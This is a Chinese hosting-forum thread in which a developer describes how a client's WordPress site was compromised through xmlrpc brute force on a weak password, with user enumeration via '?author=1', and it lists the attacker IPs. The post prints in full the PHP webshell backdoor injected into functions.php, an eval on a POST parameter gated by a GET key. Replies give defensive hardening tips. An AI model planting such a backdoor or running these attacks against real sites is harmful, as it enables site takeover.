全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 5963|回复: 36

给别人公司做的网站被黑了~

[复制链接]
发表于 2014-9-3 21:37:42 | 显示全部楼层 |阅读模式
是WP程序,自己做了个主题,今天他们公司打电话问我是不是网站维护中,网站开不了。
回家看看日志,才发现被黑了

用WP的还是安装一下插件防爆破吧
 楼主| 发表于 2014-9-3 23:01:45 | 显示全部楼层
ninqq 发表于 2014-9-3 22:18
wp 用户名不使用admin这种
密码设置该复杂的 暴力破解过毛线 他用户名都不知道 ...

http://域名/?author=1 然后就知道非admin的admin权限用户了
我看日志看到的~黑黑 ~略屌

密码我是弱口令了
 楼主| 发表于 2014-9-3 21:42:46 | 显示全部楼层
175.126.111.78 攻击 网站/xmlrpc.php (这个可以对WordPress进行暴力破解攻击)
爆破了几百次就破解了(密码是弱密码)

之后是98.126.97.154登陆后台修改了/wp-admin/theme-editor.php?file=functions.php
<?php
function _g3t($str){
    $val = !empty($_GET[$str]) ? $_GET[$str] : null;
    return $val;
}
if(_g3t('UVF')=='f')
{
@eval($_POST['aEltU']);(一句话木马)
exit;
}
if(_g3t('UVF')=='c')
{
echo 'AcJ9ksbVjsdb';
exit;
}
//dsd6sc378axvg
?>

之后网站就500了(突然发现乱写的代码略屌!)
500再之后N个小时,被发现了


WP不要用弱密码,最好安装个Login Security Solutin



以下应该都是高端肉鸡
175.126.111.78
188.121.62.249
151.236.51.90
37.187.79.43
85.204.118.142
31.193.133.4
212.98.167.210
125.253.118.46
210.210.178.20
31.193.192.184
94.138.219.186
106.187.47.170
212.82.217.9
…………
发表于 2014-9-3 21:44:16 来自手机 | 显示全部楼层
你说。。你好,为提升性能,服务器硬件更新维护
发表于 2014-9-3 21:45:39 | 显示全部楼层
这个文件一般人用不上吧,可以直接删掉或改名么?
发表于 2014-9-3 22:13:46 | 显示全部楼层
槛外人 发表于 2014-9-3 21:45
这个文件一般人用不上吧,可以直接删掉或改名么?

不需要这个功能可以改名呗
发表于 2014-9-3 22:18:18 | 显示全部楼层
wp 用户名不使用admin这种
密码设置该复杂的 暴力破解过毛线 他用户名都不知道

点评

Tou
http://domain.com/?author=1  发表于 2014-9-3 23:02
发表于 2014-9-3 22:48:54 | 显示全部楼层

用wp帮人弄一个企业站收多少钱?

点评

Tou
1.5W-(2810(阿里云)+594(10年域名)+300(美工)+1500(内部人抽成)+请客1000)=盈利  发表于 2014-9-3 23:07
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-3-29 05:49 , Processed in 0.082387 second(s), 14 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表